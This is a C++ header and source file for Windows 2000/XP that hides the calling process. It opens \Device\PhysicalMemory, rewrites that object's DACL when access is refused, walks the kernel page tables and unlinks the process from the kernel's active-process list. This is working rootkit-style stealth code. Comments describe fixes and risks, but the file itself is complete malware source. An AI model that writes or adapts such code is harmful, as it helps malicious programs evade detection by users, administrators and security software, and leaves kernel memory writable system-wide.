2000和xp下隐藏进程

// HideProcess.h
// Hides the calling process on Windows 2000/XP by patching kernel memory
// through the \Device\PhysicalMemory section (implementation in HideProcess.cpp).
// The unlink is attempted at most once per process; see the .cpp for what the
// BOOL result reports. Requires rights to open/re-ACL that section (in practice
// administrative rights) and only targets the NT 5.0/5.1 x86 builds.
BOOL HideProcess();

 

 

// HideProcess.cpp
#include < windows.h >
#include
< Accctrl.h >
#include
< Aclapi.h >

#include
" HideProcess.h "

// NT-native definitions re-declared locally (presumably to avoid pulling in
// the DDK headers). NT_SUCCESS follows the kernel convention: any
// non-negative NTSTATUS is success.
#define  NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
// Defined but never referenced anywhere in this listing.
#define  STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
// The status that OpenPhysicalMemory keys its DACL-rewrite fallback off.
#define  STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

// NTSTATUS is a signed 32-bit code; the sign bit is the severity (error).
typedef LONG NTSTATUS;

// Native IO_STATUS_BLOCK layout. Declared for completeness only; nothing in
// this listing references it.
typedef 
struct  _IO_STATUS_BLOCK 
{
    NTSTATUS Status;
    ULONG Information;
}
 IO_STATUS_BLOCK,  * PIO_STATUS_BLOCK;

// Native counted Unicode string used for object-manager names. In this file it
// is only ever filled in by ntdll!RtlInitUnicodeString (OpenPhysicalMemory), so
// the byte-vs-character convention of Length never has to be computed here.
typedef 
struct  _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
}
 UNICODE_STRING,  * PUNICODE_STRING;

// OBJECT_ATTRIBUTES.Attributes flags (native object-manager values). This
// listing always passes Attributes = 0, so none of these are actually used;
// note in particular that OBJ_CASE_INSENSITIVE is not set, so the device name
// passed to ZwOpenSection must match the object manager's case exactly.
#define  OBJ_INHERIT                0x00000002L
#define  OBJ_PERMANENT            0x00000010L
#define  OBJ_EXCLUSIVE            0x00000020L
#define  OBJ_CASE_INSENSITIVE    0x00000040L
#define  OBJ_OPENIF                0x00000080L
#define  OBJ_OPENLINK            0x00000100L
#define  OBJ_KERNEL_HANDLE        0x00000200L
#define  OBJ_VALID_ATTRIBUTES    0x000003F2L

// Native OBJECT_ATTRIBUTES: names the object a Zw*/Nt* open call should
// resolve. Filled in field-by-field in OpenPhysicalMemory (Length must be
// sizeof(OBJECT_ATTRIBUTES); RootDirectory NULL means an absolute name).
typedef 
struct  _OBJECT_ATTRIBUTES 
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}
 OBJECT_ATTRIBUTES,  * POBJECT_ATTRIBUTES; 

// Prototype of ntdll!ZwOpenSection, resolved by GetProcAddress in InitNTDLL.
// Declared with the CALLBACK (stdcall) convention expected of the x86 ntdll
// exports. SectionHandle receives the opened section on success.
typedef NTSTATUS (CALLBACK
*  ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

// Prototype of ntdll!RtlInitUnicodeString, resolved in InitNTDLL. Points
// DestinationString at SourceString (no copy), so the source must outlive the
// UNICODE_STRING; OpenPhysicalMemory uses a string literal, which is fine.
typedef VOID (CALLBACK
*  RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

// ntdll entry points resolved at run time by InitNTDLL (NULL until then).
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
// Module handle for ntdll.dll; owned by InitNTDLL / CloseNTDLL.
HMODULE g_hNtDLL 
=  NULL;
// View of the kernel page directory, mapped by OpenPhysicalMemory and walked
// by LinearToPhys.
PVOID g_pMapPhysicalMemory 
=  NULL;
// Section handle for \Device\PhysicalMemory, opened by OpenPhysicalMemory and
// used by every later MapViewOfFile.
HANDLE g_hMPM 
=  NULL;
// OS version, filled in by OpenPhysicalMemory and re-read by YHideProcess to
// pick the build-specific structure offsets.
OSVERSIONINFO g_osvi;
// ---------------------------------------------------------------------------
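// Loads ntdll.dll and resolves the two exports this file needs
// (RtlInitUnicodeString, ZwOpenSection) into the file-level function pointers.
//
// Returns TRUE on success. Returns FALSE — with g_hNtDLL released and reset to
// NULL and both pointers NULL — if the module cannot be loaded or either export
// is missing. The published version never checked the GetProcAddress results,
// so a missing export would have been called through a NULL pointer later.
// ANSI build assumed (a char string literal is passed to LoadLibrary).
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL)
        return FALSE;

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");

    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
    {
        // Leave everything in the "never initialised" state so a retry is clean.
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        RtlInitUnicodeString = NULL;
        ZwOpenSection = NULL;
        return FALSE;
    }

    return TRUE;
}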

// ---------------------------------------------------------------------------
// Releases the ntdll module reference taken by InitNTDLL and clears the
// handle. Safe to call when InitNTDLL never ran or the handle is already
// closed. The resolved function pointers are left as they were (they dangle
// once the module is unloaded, as in the original).
VOID CloseNTDLL()
{
    HMODULE hModule = g_hNtDLL;
    g_hNtDLL = NULL;

    if (hModule != NULL)
        FreeLibrary(hModule);
}

// ---------------------------------------------------------------------------
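// Adds an ACE granting the calling user SECTION_MAP_WRITE on the
// \Device\PhysicalMemory section so that the following
// ZwOpenSection(SECTION_MAP_READ|SECTION_MAP_WRITE) in OpenPhysicalMemory can
// succeed. hSection must have been opened with READ_CONTROL|WRITE_DAC, which in
// practice requires administrative rights.
//
// Security note: this rewrites the DACL of a system-wide kernel object and
// never restores it, so for the rest of the boot session every process running
// as this user can map physical memory. That DACL change is also an artifact a
// defender can look for.
//
// Fixes over the published listing: the opening brace and a semicolon were
// missing; on a failed SetEntriesInAcl the code fell through and called
// SetSecurityInfo with a NULL DACL (i.e. "no protection" — world access); on a
// double failure pSD was freed twice; and nothing was freed on success.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    PACL pNewDacl = NULL;
    EXPLICIT_ACCESS ea;
    DWORD dwRes;

    // Read the current DACL; pDacl points inside pSD, so only pSD is freed.
    dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, &pDacl, NULL, &pSD);
    if (ERROR_SUCCESS != dwRes)
        goto cleanup;

    // "CURRENT_USER" is one of the special trustee names SetEntriesInAcl
    // resolves itself to the caller's SID. ANSI build assumed (LPTSTR == char*).
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = (LPTSTR)"CURRENT_USER";

    // Merge the new ACE into the existing DACL rather than replacing it.
    dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (ERROR_SUCCESS != dwRes)
        goto cleanup;

    // Only reached with a non-NULL pNewDacl. The caller detects failure here by
    // re-opening the section and checking that status.
    SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                    NULL, NULL, pNewDacl, NULL);

cleanup:
    if (pNewDacl)
        LocalFree(pNewDacl);
    if (pSD)
        LocalFree(pSD);
}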
 
// ---------------------------------------------------------------------------
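// Opens \Device\PhysicalMemory read/write and maps the one page holding the
// kernel page directory, so LinearToPhys can later walk the page tables.
//
// Returns the section handle (also stored in g_hMPM) on success, NULL
// otherwise. On success g_pMapPhysicalMemory holds the page-directory view and
// g_osvi the OS version (re-read by YHideProcess). If the first open is refused
// with STATUS_ACCESS_DENIED the section's DACL is rewritten via
// SetPhyscialMemorySectionCanBeWrited — a persistent, system-wide change.
//
// Assumptions baked into the constants: 32-bit x86, no PAE, and a
// page-directory physical address of 0x30000 (2000) / 0x39000 (XP). These are
// not guaranteed across builds or boot configurations — confirm against the
// target before relying on them. Later Windows versions removed user-mode
// access to this object altogether, so the technique does not carry over.
//
// Fixes over the published listing: missing `{` and `break;` terminators, the
// GetVersionEx result is checked, the status of the READ_CONTROL|WRITE_DAC
// re-open is checked before its handle is used, the object path uses the
// backslash separators the object manager requires (the listing shows forward
// slashes), and the handle is released when the final map fails.
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&g_osvi))
        return NULL;

    // Only the NT 5.x line is handled; everything else is rejected outright.
    if (5 != g_osvi.dwMajorVersion)
        return NULL;

    switch (g_osvi.dwMinorVersion)
    {
    case 0:
        PhyDirectory = 0x30000;  // Windows 2000
        break;
    case 1:
        PhyDirectory = 0x39000;  // Windows XP
        break;
    default:
        return NULL;
    }

    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;  // no OBJ_CASE_INSENSITIVE: exact-case lookup
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);

    if (status == STATUS_ACCESS_DENIED)
    {
        // Re-open with just enough access to edit the DACL, widen it, then
        // try the real open again.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
        if (!NT_SUCCESS(status))
        {
            g_hMPM = NULL;
            return NULL;
        }
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    }

    if (!NT_SUCCESS(status))
    {
        g_hMPM = NULL;
        return NULL;
    }

    // One 4 KiB page at PhyDirectory: the page directory itself.
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
    if (g_pMapPhysicalMemory == NULL)
    {
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
        return NULL;
    }

    return g_hMPM;
}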

// ---------------------------------------------------------------------------
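// Translates a kernel linear address to a physical address by walking the
// 32-bit non-PAE page tables through the mapped page directory.
//
// BaseAddress: the mapped page directory (g_pMapPhysicalMemory).
// addr:        linear address to translate.
// Returns the physical address, or 0 when the PDE or PTE is not present or the
// page-table page cannot be mapped. 0 is also a legitimate physical address;
// callers treat it as "not mapped".
//
// Fixes over the published listing: the large-page expression was missing a
// closing parenthesis; the page-table MapViewOfFile call was missing its
// offset arguments (the listing shows "40", which reads as "4, 0" with the
// separator lost, so FILE_MAP_READ is used); a NULL map result is no longer
// dereferenced; and the page-table view is unmapped on the not-present path
// instead of leaking.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;
    ULONG PAddr;

    // Top 10 bits index the page directory.
    ULONG PGDE = BaseAddress[VAddr >> 22];
    if (0 == (PGDE & 1))            // PDE present bit
        return 0;

    if (0 != (PGDE & 0x00000080))   // PS bit: 4 MiB page, no page table to walk
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        // Map the single page-table page the PDE points at.
        PULONG pageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xfffff000, 0x1000);
        if (NULL == pageTable)
            return 0;

        // Middle 10 bits index the page table.
        ULONG PTE = pageTable[(VAddr & 0x003FF000) >> 12];
        UnmapViewOfFile(pageTable);

        if (0 == (PTE & 1))         // PTE present bit
            return 0;

        PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
    }

    return (PVOID)PAddr;
}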

// ---------------------------------------------------------------------------
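// Reads one ULONG from kernel linear address addr through the
// \Device\PhysicalMemory section.
//
// Returns the value, or 0 if the address cannot be translated or its page
// cannot be mapped — so 0 is ambiguous with a genuine zero. addr is assumed to
// be 4-byte aligned (the offset is indexed as a ULONG array).
//
// Fixes over the published listing: a failed translation (phys == 0) no longer
// falls through to mapping and reading physical page 0; the argument separator
// lost in the MapViewOfFile call is restored; the page is mapped read-only
// since this is a read.
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return 0;

    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, phys & 0xfffff000, 0x1000);
    if (NULL == page)
        return 0;

    ULONG ret = page[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(page);

    return ret;
}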

// ---------------------------------------------------------------------------
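// Writes one ULONG to kernel linear address addr through the
// \Device\PhysicalMemory section. There is no synchronization with the kernel,
// so the write races with whatever the kernel is doing to that memory.
//
// Returns TRUE on success, FALSE if the address cannot be translated or its
// page cannot be mapped. addr is assumed to be 4-byte aligned.
//
// Fixes over the published listing: a failed translation (phys == 0) no longer
// results in a write into physical page 0; the lost `]` and argument separator
// are restored.
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return FALSE;

    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (NULL == page)
        return FALSE;

    page[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(page);

    return TRUE;
}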

// ---------------------------------------------------------------------------
// Unhandled-exception filter that terminates the process quietly with exit
// code 0 instead of letting the system report the crash. Nothing in this file
// currently installs it. The exception record is not inspected.
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
    (void)tmp;
    ExitProcess(0);

    // Not reached; the filter contract still requires a disposition (== 1).
    return EXCEPTION_EXECUTE_HANDLER;
}

// ---------------------------------------------------------------------------
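// Unlinks the current process from a kernel doubly-linked process list by
// patching the list entry in its process object via \Device\PhysicalMemory.
//
// Walk: the pointer at 0xFFDFF124 (the original comments call this the KTEB;
// on x86 that address lies in the per-processor KPCR page — confirm against the
// target), then +0x44 into the thread for the owning process (the "KPEB"), then
// the LIST_ENTRY at +0xa0 (2000) / +0x88 (XP). By those offsets this is
// presumably EPROCESS.ActiveProcessLinks; verify against the build's symbols.
//
// Returns TRUE when both neighbouring list pointers were rewritten. Returns
// FALSE if setup failed, any kernel pointer read back as 0, or a write failed;
// if the second write fails the first is rolled back, because a half-unlinked
// entry is a bugcheck waiting to happen. The offsets are build-specific and the
// writes are not synchronized with the kernel.
//
// Fixes over the published listing: fw/bw could be used uninitialised, a zero
// pointer would have been written to physical page 0, SetData results were
// ignored, the page-directory view was never unmapped, and the module was
// leaked when OpenPhysicalMemory failed.
BOOL YHideProcess()
{
    if (FALSE == InitNTDLL())
        return FALSE;

    if (NULL == OpenPhysicalMemory())
    {
        CloseNTDLL();
        return FALSE;
    }

    BOOL ok = FALSE;
    ULONG linkOffset;
    switch (g_osvi.dwMinorVersion)
    {
    case 0:
        linkOffset = 0xa0;  // Windows 2000
        break;
    case 1:
        linkOffset = 0x88;  // Windows XP
        break;
    default:
        goto done;          // OpenPhysicalMemory already rejects this
    }

    {
        ULONG thread = GetData((PVOID)0xFFDFF124);                   // kteb
        ULONG process = thread ? GetData((PVOID)(thread + 0x44)) : 0; // kpeb
        if (0 == thread || 0 == process)
            goto done;

        ULONG entry = process + linkOffset;           // our LIST_ENTRY
        ULONG fw = GetData((PVOID)entry);             // Flink: next entry
        ULONG bw = GetData((PVOID)(entry + 4));       // Blink: previous entry
        if (0 == fw || 0 == bw)
            goto done;

        // Remember next->Blink so the first write can be undone.
        ULONG savedNextBlink = GetData((PVOID)(fw + 4));

        // next->Blink = prev
        if (!SetData((PVOID)(fw + 4), bw))
            goto done;

        // prev->Flink = next; on failure restore the first write.
        if (!SetData((PVOID)bw, fw))
        {
            SetData((PVOID)(fw + 4), savedNextBlink);
            goto done;
        }

        ok = TRUE;
    }

done:
    if (g_pMapPhysicalMemory)
    {
        UnmapViewOfFile(g_pMapPhysicalMemory);
        g_pMapPhysicalMemory = NULL;
    }
    if (g_hMPM)
    {
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
    }
    CloseNTDLL();

    return ok;
}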


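// Public entry point. Attempts the unlink and remembers success, so once the
// process is hidden repeated calls are no-ops. Returns the result of the most
// recent attempt. The published version set its flag before calling and always
// returned true, which both hid failures from the caller and made a later
// retry impossible. Not thread-safe (plain static flag), as before.
BOOL HideProcess()
{
    static BOOL s_hidden = FALSE;

    if (!s_hidden)
        s_hidden = YHideProcess();

    return s_hidden;
}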